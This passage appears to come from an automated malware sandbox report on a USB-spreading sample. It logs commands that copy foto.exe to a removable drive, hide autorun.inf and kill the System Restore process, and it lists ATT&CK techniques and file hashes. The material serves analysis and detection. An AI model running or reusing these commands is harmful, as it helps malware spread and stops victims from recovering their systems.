    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2432
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\windows_update.bat

Filesize
1KB

MD5
bc4a82e294f1ef73ebf54d8cbff10e1f

SHA1
c8a0d9522ef20d16e9f4f23bad004b2ee49f600e

SHA256
5556c225c15254fb8209479757dfd680a3b8f9dd97554777e8a63ad8718fee6d

SHA512
1d0857fea9ca525196a3f9ba46eefa88d75b9f036ba5322e08426d595e3ee18511656cd37d885c9bca95288aacd8d1d8391d47c2b34c1e9e66d7d201ec6da897

Download Submit
F:\autorun.inf

Filesize
119B

MD5
cd5420c9932b95d7511ecbddf14ae6c7

SHA1
01fc0690cea6eda07b36f07360a9bbd010ece61d

SHA256
a80abb5d332141c06617529eac78fe3da275d986c7a968b3bb5d045f4ca9e03c

SHA512
c7f0545816f67a191b16b03e7fda5a0952a4366ae5284796625c0e133f07c92cae69dcee1fe2a0ce06a529899db74e70674f3a236e4d675d0a048e069a4bc210

Download Submit
memory/2256-0-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2256-11-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download